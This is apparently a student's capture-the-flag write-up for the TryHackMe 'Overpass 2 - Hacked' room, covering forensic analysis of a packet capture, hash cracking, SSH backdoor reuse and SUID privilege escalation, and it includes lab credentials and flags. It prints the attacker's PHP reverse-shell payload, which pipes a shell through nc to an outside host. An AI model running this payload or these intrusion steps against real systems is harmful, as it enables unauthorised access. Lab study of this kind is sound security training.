# Overpass 2 - Hacked

> Shay Pasvolsky
> Started: 04/10/20 07-08-40
> Finished: 04/10/20 08-44-00

---

---

## General info

```bash
export MIP=10.10.200.73
export MyIP=10.9.134.47
```

### Users

```txt
    User: paradox
        Password: secuirty3
    User: szymex
        Password: abcd123
    User: bee
        Password: secret12
    User: muirland
        Password: 1qaz2wsx
    User: james
        Password: november16
```

### Open Ports

```txt
    port:
        type: tcp, udp, tcp6, udp6
        service:
            version:
            Has Vuln:
```

---

## Tasks

### Task 1

1. What was the URL of the page they used to upload a reverse shell?

    ```txt
    /development/
    ```

2. What payload did the attacker use to gain access?

    ```GUI
    folow the http stream of the post request.
    ```

    ```txt
    <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
    ```

3. What password did the attacker use to privesc?

    ```GUI
    folot the tcp stream of all comuincations on port 4242 (tcp)
    ```

    ```txt
    whenevernoteartinstant
    ```

4. How did the attacker establish persistence?

    ```GUI
    find the backdor link
    ```

    ```txt
    https://github.com/NinjaJc01/ssh-backdoor
    ```

5. Using the fasttrack wordlist, how many of the system passwords were crackable?

    ```bash
    sudo john --wordlist=/usr/share/wordlists/fasttrack.txt ~/Projects/Cysec/tryhackme/tryhackme/Rooms/Overpass\ 2\ -\ Hacked/creds.hash
    ```

    ```txt
    4
    ```

### Task 2

1. What's the default hash for the backdoor?

    ```firefox-gui
    go to the backdoor github
    find the source code (.go)
    search "hash"
    ```

    ```txt
    bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3
    ```

2. What's the hardcoded salt for the backdoor?

    ```firefox-gui
    search for salt - get the function name
    search for the function name, the second var is the salt
    ```

    ```txt
    1c362db832f3f864c8c2fe05f2002a05
    ```

3. What was the hash that the attacker used? - go back to the PCAP for this!

    ```txt
    6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
    ```

4. Crack the hash using rockyou and a cracking tool of your choice. What's the password?

    ```firefox-gui
    from the source code we find the hashpassword function - it tells us that the password is hashed using SHA512
    use hashcat for that
    find the right code and format for the hash
    ```

    ```bash
        hashcat --help | less
        /sha512
    ```

    ```txt
        code 1710
        format sha512($pass.$salt) -> $hash:$salt
    ```

    ```bash
        hashcat -m 1710 -o res.txt backdor.hash /usr/share/wordlists/rockyou.txt
    ```

    ```txt
        november16
    ```

### Task 3

1. The attacker defaced the website. What message did they leave as a heading?

    ```firefox-gui
        go to the website on the server
    ```

    ```txt
        H4ck3d by CooctusClan
    ```

2. Using the information you've found previously, hack your way back in!

    ```txt-instructions
        run nmap scan - found ssh on port 2222
        connect to the machine with "james":"november16" on port 2222
    ```

    ```txt
        Hit 'completed'
    ```

3. What's the user flag?

    ```bash
        cd ../
        cat user.txt
    ```

    ```txt
        thm{d119b4fa8c497ddb0525f7ad200e6567}
    ```

4. What's the root flag?

    ```bash
        ls -al -> found .suid_bash with SUID set
        ./.suid_bash -p
        whoami -> root
        find / -name root.txt -> /root/root.txt
        cat /root/root.txt
    ```

    ```txt
        thm{d53b2684f169360bb9606c333873144d}
    ```
